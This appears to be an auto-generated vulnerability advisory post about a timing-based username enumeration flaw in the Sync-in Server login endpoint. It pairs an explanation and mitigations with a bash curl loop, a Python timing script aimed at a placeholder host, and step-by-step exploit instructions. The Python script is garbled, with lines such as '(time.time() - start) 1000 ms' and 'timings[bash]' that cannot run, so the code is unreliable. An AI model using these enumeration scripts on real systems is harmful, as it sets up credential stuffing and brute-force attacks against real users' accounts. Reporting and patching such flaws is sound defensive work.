Listen to this Post
The `/api/auth/login` endpoint contains a logic flaw that allows unauthenticated remote attackers to enumerate valid usernames by measuring the application’s response time. The vulnerability is a classic timing side‑channel (CWE‑208) that arises because the authentication logic follows different execution paths depending on whether a username exists in the system.
The vulnerable code can be found in the `users-queries.service.ts` file, specifically at lines 91‑95 in the commit 7868bb2b3025f92e6c38087456304758713971b2. The flaw is that when an invalid username is submitted, the backend short‑circuits the authentication process early, skipping computationally expensive operations such as hashing and comparing passwords. This short‑circuiting results in a much faster response time. Conversely, when a valid username is provided, the server proceeds to the full authentication routine, including password hashing and verification, which adds significant processing time.
An attacker can exploit this by sending a series of POST requests to the `/api/auth/login` endpoint with different usernames while measuring the time it takes for the server to respond. The difference in response time between a valid and an invalid username is large enough to be reliably detected over a network. The TickTock Enum Burp Suite extension was used to validate the finding, showing that valid usernames returned in 350‑400ms on average, while invalid ones returned in only 95‑100ms.
This timing discrepancy allows an unauthenticated remote attacker to build a list of valid usernames, which can then be used to mount more targeted attacks such as credential stuffing, brute‑force login attempts, or social engineering campaigns.
dailycve form:
Platform: Sync-in Server
Version: commit 7868bb2b3025f92e6c38087456304758713971b2
Vulnerability: Username Enumeration
Severity: Moderate
date: 2026-04-14
Prediction: 2026-04-28
Analytics under heading What Undercode Say:
Simulate timing-based username enumeration using curl and time
for username in admin user test support; do
echo -n "$username: "
time curl -s -X POST https://target.com/api/auth/login \
-H "Content-Type: application/json" \
-d "{\"username\":\"$username\",\"password\":\"dummy\"}" > /dev/null
done
Python script to automate timing attack
import requests
import time
url = "https://target.com/api/auth/login"
usernames = ["admin", "user", "test", "support"]
timings = {}
for username in usernames:
start = time.time()
response = requests.post(url, json={"username": username, "password": "dummy"})
elapsed = (time.time() - start) 1000 ms
timings[bash] = elapsed
print(f"{username}: {elapsed:.2f} ms")
threshold = 200 ms
valid = [u for u, t in timings.items() if t > threshold]
print(f"Valid usernames: {valid}")
Exploit:
1. Identify the login endpoint (e.g., `/api/auth/login`).
2. Generate a list of candidate usernames.
- For each candidate, send a login request with an arbitrary password.
- Measure the response time using network monitoring tools or scripted timers.
- Compare the response times: times above ~200ms indicate a valid username.
- Use the discovered valid usernames for further attacks.
Protection from this CVE:
- Ensure that the authentication endpoint always executes a password hash comparison, even for non‑existent users.
- Introduce a constant‑time delay or use a fake password hash for invalid usernames to mask timing differences.
- Implement rate limiting on the login endpoint to slow down enumeration attempts.
- Monitor for anomalous spikes in login requests that could indicate a timing attack.
Impact:
An unauthenticated remote attacker can enumerate valid usernames, significantly weakening the application’s security posture. This information can be used to launch targeted brute‑force attacks, credential stuffing, social engineering, and other focused attacks against the system.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
